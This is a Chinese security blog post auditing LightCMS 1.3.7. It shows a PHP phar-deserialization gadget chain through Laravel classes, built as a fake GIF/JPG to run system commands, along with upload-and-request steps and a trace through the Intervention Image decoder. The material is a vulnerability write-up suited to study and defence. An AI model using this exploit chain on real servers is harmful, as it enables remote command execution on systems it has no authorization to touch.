[PHP代码审计]LightCMS1.3.7存在命令执行漏洞
文章目录
- 写在前面
- 利用姿势
- 分析
写在前面
之前就想复现来着了,后来给我忘了,今晚补上吧
利用姿势
首先用phpggc
生成一个phar
,当然嫌弃懒的话可以用这个
<?phpnamespace Illuminate\Broadcasting{class PendingBroadcast{protected $events;protected $event;public function __construct($events, $event){$this->events = $events;$this->event = $event;}}class BroadcastEvent{protected $connection;public function __construct($connection){$this->connection = $connection;}}}namespace Illuminate\Bus{class Dispatcher{protected $queueResolver;public function __construct($queueResolver){$this->queueResolver = $queueResolver;}}
}namespace{$command = new Illuminate\Broadcasting\BroadcastEvent('whoami');$dispater = new Illuminate\Bus\Dispatcher("system");$PendingBroadcast = new Illuminate\Broadcasting\PendingBroadcast($dispater,$command);$phar = new Phar('phar.phar');$phar -> stopBuffering();$phar->setStub("GIF89a"."<?php __HALT_COMPILER(); ?>");$phar -> addFromString('test.txt','test');$phar -> setMetadata($PendingBroadcast);$phar -> stopBuffering();rename('phar.phar','phar.jpg');}
之后上传到你的后台获得相对路径
之后在你的vps中写入
phar://./upload/image/202106/uzOpshR76Znv0gG6mvL9YHBRXPI5EaEDFpwqfgCp.gif
最后请求,成功执行
分析
漏洞点和之前爆出的任意文件读取与RCE那个地方一样,在Http/Controllers/Admin/NEditorController.php
下的fetchImageFile
函数,因为我传入的不是Webp文件,所以进入Image::make($data);
,而这个data变量也就是请求返回的内容
一直跟进到src/Intervention/Image/AbstractDecoder.php
下的init
方法
public function init($data){$this->data = $data;switch (true) {case $this->isGdResource():return $this->initFromGdResource($this->data);case $this->isImagick():return $this->initFromImagick($this->data);case $this->isInterventionImage():return $this->initFromInterventionImage($this->data);case $this->isSplFileInfo():return $this->initFromPath($this->data->getRealPath());case $this->isBinary():return $this->initFromBinary($this->data);case $this->isUrl():return $this->initFromUrl($this->data);case $this->isStream():return $this->initFromStream($this->data);case $this->isDataUrl():return $this->initFromBinary($this->decodeDataUrl($this->data));case $this->isFilePath():return $this->initFromPath($this->data);// isBase64 has to be after isFilePath to prevent false positivescase $this->isBase64():return $this->initFromBinary(base64_decode($this->data));default:throw new NotReadableException("Image source not readable");}}
在isUrl分支
继续跟踪
妥妥的可以触发phar://
反序列化
[PHP代码审计]LightCMS1.3.7存在命令执行漏洞相关推荐
- php代码审计命令执行,PHP代码审计笔记--命令执行漏洞
命令执行漏洞,用户通过浏览器在远程服务器上执行任意系统命令,严格意义上,与代码执行漏洞还是有一定的区别. 0x01漏洞实例 例1: $target=$_REQUEST['ip']; $cmd = sh ...
- [PHP代码审计]iWebShop开源商城系统V5.9.21010存在命令执行漏洞
@Y4tacker 文章目录 写在前面 iWebShop5.9存在命令执行漏洞 目录结构 漏洞演示及利用 写在前面 本漏洞是后台权限,配合sql注入导致的文件删除,之后导致可重装从而实现RCE,搞了一 ...
- 代码审计-dubbo admin =2.6.1远程命令执行漏洞
前置 输入材料 安全目标和需求 架构分析 供应链安全 源代码审查 依赖结构矩阵(Dependency Structure Matrices,DSM) 数据流 信任边界 数据存贮 威胁列表 otter ...
- RCE代码及命令执行漏洞简解
在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用 代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞 ...
- 30.WEB漏洞-RCE代码及命令执行漏洞
30:WEB漏洞-RCE代码及命令执行漏洞 参考文章:https://www.cnblogs.com/zhengna/p/15775737.html 本文为博主学习复现笔记 文章目录 30:WEB漏洞 ...
- RCE漏洞以及命令执行漏洞
目录 概念 代码执行和命令执行区别 代码执行漏洞特点 命令执行漏洞特点 漏洞形成条件 漏洞产生地方 如何检测漏洞 白盒情况下 黑盒情况下 防御方案 变量过滤或固定 WAF产品防火墙防护 敏感函数禁用 ...
- 邮件传输代理Exim远程命令执行漏洞细节披露,影响全球近一半邮件服务器
注意:是远程命令执行,不是远程代码执行 Exim是一个MTA(Mail Transfer Agent,邮件传输代理)服务器软件,该软件基于GPL协议开发,是一款开源软件.该软件主要运行于类UNIX系统 ...
- 文件包含与命令执行漏洞详解
代码注入 远程文件包含漏洞 文件包含 了解什么是本地文件包含漏洞 了解本地文件包含漏洞所要用到的函数 掌握本地文件包含漏洞的利用方式 了解 PHP 语言中的封装协议 掌握本地文件包含漏洞的修复方法 什 ...
- 命令执行漏洞 java_白帽子挖洞—命令执行(Commnd Execution)篇
0x00介绍 命令执行漏洞概念:当应用需要调用一些外部程序去处理内容的情况下,就会用到一些执行系统命令的函数.如PHP中的system,exec,shell_exec等,当用户可以控制命令执行函数中的 ...
最新文章
- myloader原理解析
- python界面散点图_Python数据可视化——散点图
- Python 运算符 if和while的使用
- linux arp 老化时间,Linux实现的ARP缓存老化时间原理解析
- Linux---Google Chrome的安装
- 【MFC系列-第23天】CMemoryDC的封装过程
- 2 数据源配置_如何在程序运行中动态切换数据源?架构师必读秘笈
- java怎么查问题,java线上问题排查(日志、资源、代码定位)
- TCP UDP 套接字
- asp.net门诊收费管理系统案例
- godot读写本地文件
- 快速上手ndk开发! Mac/Win下配置和使用!(2018.4重编版)
- 尤雨溪:Vue3 将在2022年2月7日成为新的默认版本(你准备好了吗?)
- sql简单查询和排序分组
- matlab 脉冲密度调制,脉冲压缩技术研究指导.doc
- P4844 LJJ爱数数 数论
- 成都学python哪个机构好_成都学python人工智能哪个机构好
- SPSS Modeler基础操作与模型求解
- (debug)vue-pdf预览时公式里的英文乱码
- uBlock Origin中文使用手册,告诉你uBlock Origin怎么用!